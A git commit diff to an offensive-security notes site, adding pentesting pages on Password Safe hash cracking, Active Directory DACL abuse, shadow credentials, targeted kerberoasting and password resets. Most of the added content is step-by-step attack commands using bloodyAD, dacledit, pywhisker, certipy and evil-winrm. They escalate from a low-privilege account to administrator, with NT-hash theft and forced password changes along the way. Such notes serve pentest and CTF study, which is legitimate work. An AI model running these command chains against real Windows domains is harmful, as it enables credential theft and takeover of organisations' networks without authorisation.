modified shadow credentials and others

hdks-bug · hdks-bug · commit acab5e0bc91f · 2025-03-13T22:21:40.000+09:00
diff --git a/src/exploit/cryptography/tool/password-safe-pentesting.md b/src/exploit/cryptography/tool/password-safe-pentesting.md
@@ -0,0 +1,34 @@
+---
+title: Password Safe Pentesting
+description: Password Save is a password database utility. We may retrieve passwords for users.
+tags:
+    - Cryptography
+refs:
+date: 2025-03-13
+draft: false
+---
+
+## Install PasswordSafe Manager
+
+Go to the [release page](https://github.com/pwsafe/pwsafe/releases) and download it.  
+
+For example, if you use Debian, download `.deb` package and run the following command:
+
+```bash
+sudo dpkg -i passwordsafe-debian12-x.x-amd64.deb
+```
+
+## Analyze `.pwsafe3` file
+
+```bash
+pwsafe example.pwsafe3
+```
+
+## Crack `.pwsafe` Password
+
+If the password is required to open `.pwsafe` file in the PasswordSafe manger, we might be able to crack the password of the `.pwsafe` file as below:
+
+```bash
+pwsafe2john example.pwsafe3 > hash.txt
+john --wordlist=wordlist.txt hash.txt
+```
diff --git a/src/exploit/windows/active-directory/dacl-attack.md b/src/exploit/windows/active-directory/dacl-attack.md
@@ -7,10 +7,21 @@ tags:
 refs:
     - https://www.thehacker.recipes/a-d/movement/dacl
     - https://learn.microsoft.com/en-us/windows/win32/secauthz/access-control-lists
-date: 2024-12-24
+date: 2025-03-13
 draft: false
 ---
 
+## Set Ownership of Group
+
+Using [BloodyAD](https://github.com/CravateRouge/bloodyAD), we can set the user as the owner of a group.
+
+```bash
+# Install if it does not exist on your machine.
+pipx install bloodyAD
+
+bloodyAD --host <target-ip> -d example.local -u <username> -p <password> set owner <group-name> <username>
+```
+
 ## Add Rights
 
 We may be able to take a full control of securable objects by getting GenericAll permission on OU (Organizational Unit). 
@@ -37,22 +48,58 @@ export KRB5CCNAME=username.ccache
 
 ### 2. Read DACL
 
-We can use `Impacket`'s  `dacledit` which has not yet been merged as of 2023/10/21.  
+We can use `dacledit` of `impackets`.  
+To use `dacledit`, we need to clone the repository and install dependencies as below:
 
-The repository is here: https://github.com/ShutdownRepo/impacket/tree/dacledit
+```bash
+git clone https://github.com/fortra/impacket.git
+cd impacket
+python3 -m venv .venv
+source .venv/bin/activate
+pip3 install impacket
+pip3 install -r requirements.txt
+python3 examples/dacledit.py --help
+```
+
+Then run the following command:
 
 ```bash
-dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password
+python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password
 # -use-ldaps: Use LDAPS instead of LDAP
 # -k: Use Kerberos authentication
-dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password -use-ldaps -k
+python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password -use-ldaps -k
 ```
 
 ### 3. Write DACL
 
 ```bash
-dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
+python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
 # -use-ldaps: Use LDAPS instead of LDAP
 # -k: Use Kerberos authentication
-dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
+python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
+```
+
+## Abuse
+
+After adding rights, we can abuse it with various methods.
+
+### Method 1. Add User to Group → Get TGT → Get NT Hash
+
+```bash
+# 1. Add user to a specific group
+bloodyAD --host <target-ip> -u <username> -p <password> add groupMember <group> <username>
+
+# 2. Add the target user to a privileged group
+python3 pywhisker.py -d example.local -u <username> -p <password> --target <target-username> --action add
+
+# 3. Obtain a Kerberos TGT using PKINIT authentication with a PFX certificate
+python3 gettgtpkinit.py example.local/<target-username> -cert-pfx <pfx-filepath> -pfx-pass <pfx-password> ./example.ccache
+
+export KRB5CCNAME=./example.ccache
+
+# 4. Retrieve the NT hash of the target user using the obtained Kerberos ticket
+python3 getnthash.py example.local/<target-username> -key <key>
+
+# 5. Login with the retrieved NT hash
+evil-winrm -i <target-ip> -u <target-username> -H <nt-hash>
 ```
diff --git a/src/exploit/windows/active-directory/kerberoasting-attack.md b/src/exploit/windows/active-directory/kerberoasting-attack.md
@@ -6,11 +6,11 @@ tags:
     - Windows
 refs:
     - https://www.thehacker.recipes/a-d/movement/kerberos/kerberoast
-date: 2024-12-24
+date: 2025-03-13
 draft: false
 ---
 
-## Attack
+## Basic Attack
 
 If we have a password hash of a user, we might be able to find another user credential using the hash.
 
@@ -20,7 +20,6 @@ impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfil
 # -no-preauth: https://github.com/SecureAuthCorp/impacket/pull/1413
 impacket-GetUserSPNs -no-preauth username -usersfile users.txt -dc-host <ip-or-host> example.local/
 
-
 netexec ldap <target-ip> -u username -p password --kerberoasting output.txt
 netexec ldap <target-ip> -u '' -p '' --kerberoasting output.txt
 ```
@@ -39,3 +38,19 @@ hashcat -m 19700 -a 0 hash.txt wordlist.txt
 ```
 
 Note that we may need to modify the hash format a bit so that john or hashcat can recognize it.
+
+## Get Hashes with TargetedKerberoast
+
+[TargetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) is a Python script that can print kerberoast hashes for user accounts that have a SPN set. We can get the hashes for users in the target machine.
+
+```bash
+# (Optional) Sync datetime for the target machine
+sudo rdate -n example.com
+# or
+sudo ntpdate example.com
+
+# Execute targetedKerberoast to get the hash.
+git clone https://github.com/ShutdownRepo/targetedKerberoast
+cd targetedKerberoast
+python3 targetedKerberoast.py -d example.com -u 'username' -p 'password'
+```
diff --git a/src/exploit/windows/active-directory/shadow-credentials.md b/src/exploit/windows/active-directory/shadow-credentials.md
@@ -7,7 +7,7 @@ tags:
     - Windows
 refs:
     - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
-date: 2023-12-14
+date: 2025-03-13
 draft: false
 ---
 
@@ -18,8 +18,23 @@ If the attacker can modify the target object's (user or computer account) attrib
 ### Using Certipy
 
 ```bash
-# -k: Use Kerberos authentication
-certipy shadow auto -account "targetuser" -u "username@example.local" -p 'password' -dc-ip 10.0.0.1 -target dc.example.local -k
+# 1. Add a shadow certificate for the target user account
+certipy shadow auto -u <user>@<target-ip> -hashes <nt-hash-of-user> -account <target-user>
+
+# 2. Update the target account's UPN (User Principal Name) to "administrator"
+certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> -user <target-user> -upn administrator
+
+# 3. Request a certificate for the target account using a vulnerable CA template
+certipy req -username <target-user>@<target-ip> -hashes <nt-hash-of-target-user> ca <ca> template <template>
+
+# 4. Restore the target account's UPN to its original value
+certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> user <target-user> -upn <target-user>@<target-ip>
+
+# 5. Authenticate as the administrator using the obtained PFX certificate
+certipy auth -pfx administrator.pfx -domain "example.local"
+
+# 6. Establish a remote WinRM session as the administrator using their NTLM hash
+evil-winrm -i <target-ip> -u administrator -H <nt-hash-of-administrator>
 ```
 
 ### Using Whisker
diff --git a/src/exploit/windows/privilege-escalation/index.md b/src/exploit/windows/privilege-escalation/index.md
@@ -20,17 +20,13 @@ We might be able to find vulnerabilities on target Windows machine with automati
 - [wesng (Windows Exploit Suggester Next Generation)](https://github.com/bitsadmin/wesng)
 - [PrivescCheck](https://github.com/itm4n/PrivescCheck)
 
-<br />
-
 ## LOLBAS (Living Off the Land Binaries, Scripts and Libraries)
 
 [LOLBAS](https://lolbas-project.github.io/) provides misuses tools and executables already in the Windows system.
 So check the website.  
 
 In addition, I've created the [LOLGEN](https://lolgen.hdks.org/) that generates Living Off The Land payload.
 
-<br />
-
 ## OS Information
 
 ```powershell
@@ -48,8 +44,6 @@ Get-Date
 
 After investigating the OS information, find the vulnerabilities of OS version.
 
-<br />
-
 ## Interesting Information
 
 ```powershell
@@ -129,16 +123,12 @@ When executing `whoami /priv` command and if current user has the following priv
 - **SeTakeOwnershipPrivilege**:
     - We can [read restricted files by taking ownership](https://github.com/dollarboysushil/oscp-cpts-notes/blob/main/windows-privilege-escalation/user-privileges/setakeownershipprivilege.md).
 
-<br />
-
 ## Recent Files
 
 1. Right-click on the Windows icon.
 2. Click **Run**.
 3. Type `recent`in the search form.
 
-<br />
-
 ## Running Services
 
 ```powershell
@@ -209,8 +199,6 @@ sc start "example-service"
 When the service restarts, our 'evil' executable is executed in stead of the original executable.  
 After few seconds, we might be able to get the shell on local machine.
 
-<br />
-
 ## Running Processes
 
 ```bash
@@ -231,8 +219,6 @@ Get-Process | where {$_.ProcessName -notlike "svchost*"}
 netstat -afo | Select-String -Pattern "LISTENING"
 ```
 
-<br />
-
 ## Histories
 
 ### Command History in PowerShell Console
@@ -245,8 +231,6 @@ type c:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
 
 We might be able to find interesting information about users by checking histories of web browsers such as **Chrome**, **Microsoft Edge**, **Internet Explorer**, etc.
 
-<br />
-
 ## VSS (Volume Shadow Copy Service)
 
 VSS coordinates the actions that  are required to create a consistent a shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.
@@ -256,8 +240,6 @@ vssadmin list shadows
 vssadmin list volumes
 ```
 
-<br />
-
 ## Registry Keys
 
 We may be able to retrieve sensitive information in registry hives.  
@@ -277,8 +259,6 @@ Get-ChildItem -Path HKCU:\System -Recurse | Select-Object Name
 reg query HKLM /f password /t REG_SZ /s
 ```
 
-<br />
-
 ## Sensitive Information
 
 ```powershell
@@ -347,8 +327,6 @@ C:\Users\<username>\Documents\Outlook Files
 C:\Users\<username>\AppData\Local\Microsoft\Outlook
 ```
 
-<br />
-
 ## Open Ports
 
 ```bash
@@ -368,8 +346,6 @@ chisel server --reverse -p 9999
 
 Please refer to [this page](/exploit/network/port-forwarding/port-forwarding-with-chisel) to check how to use Chisel for port forwarding.
 
-<br />
-
 ## Getting All Local Users/Groups
 
 We can find all local users in **Computer Management** utility.
@@ -388,8 +364,6 @@ In Computer Management, click **"Local Users and Groups"**.
 2. Double-click each group.
 3. Attempt to add new user in the group because we might be able to do that even if we are not an administrator.
 
-<br />
-
 ## Set New Password for Existing User
 
 Using **PowerView**, we may be able to set new password for existing user.
@@ -405,7 +379,15 @@ $Password = ConvertTo-SecureString 'Password@123' -AsPlainText -Force
 Set-DomainUserPassword -Identity $Username -AccountPassword $Password
 ```
 
-<br />
+## Change Another User Password
+
+If current user has `GenericAll` permission to another user, we can change the user password as below:
+
+```bash
+net user <another_user> <new_password> /domain
+```
+
+Then if the another user belongs to the `Remote Management Users` group or the `Administrators` group, we can login as the user with `evil-winrm` command.
 
 ## Change File Permission
 
@@ -435,8 +417,6 @@ icacls 'C:\Path\to\file' /grant Everyone:F
 7. Enter the username in the text field.
 8. Click **OK** and **Apply**.
 
-<br />
-
 ## Take Ownership of a File (Administrators Group Required)
 
 ```powershell
@@ -459,8 +439,6 @@ takeown /r /f *.*
 icacls "example.txt" /q /c /t /grant Users:F
 ```
 
-<br />
-
 ## All Privs for Local Service, Network Service Account
 
 If we’re `Local Service` or `Network Service` account, it maybe possible to grant all privileges to the account.
@@ -474,21 +452,15 @@ FullPower
 whoami /priv
 ```
 
-<br />
-
 ## Event Logs
 
 - **Event Viewer**
 - **FullEventLogview**
 
-<br />
-
 ## Tasks
 
 - **Task Schedular**
 
-<br />
-
 ## Sysinternals
 
 Tools that offer technical resources and utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment.
@@ -514,8 +486,6 @@ strings.exe example.exe | findstr "sometext"
 strings64.exe example.exe | findstr "sometext"
 ```
 
-<br />
-
 ## Dump Sensitive Data from Recall
 
 *I'm interested with that, but I've not test yet.
diff --git a/src/exploit/windows/protocol/msrpc-pentesting.md b/src/exploit/windows/protocol/msrpc-pentesting.md
@@ -4,7 +4,7 @@ description: It is also known as a function call or a subroutine call. Default p
 tags:
     - Windows
 refs:
-date: 2024-03-17
+date: 2025-03-13
 draft: false
 ---
 
@@ -74,4 +74,7 @@ rpcclient $> querydominfo
 
 # Current username
 rpcclient $> getusername
+
+# If the current user has permission to change another user password, we can change another user password.
+rpcclient $> setuserinfo2 <another_user> 23 <new_password>
 ```
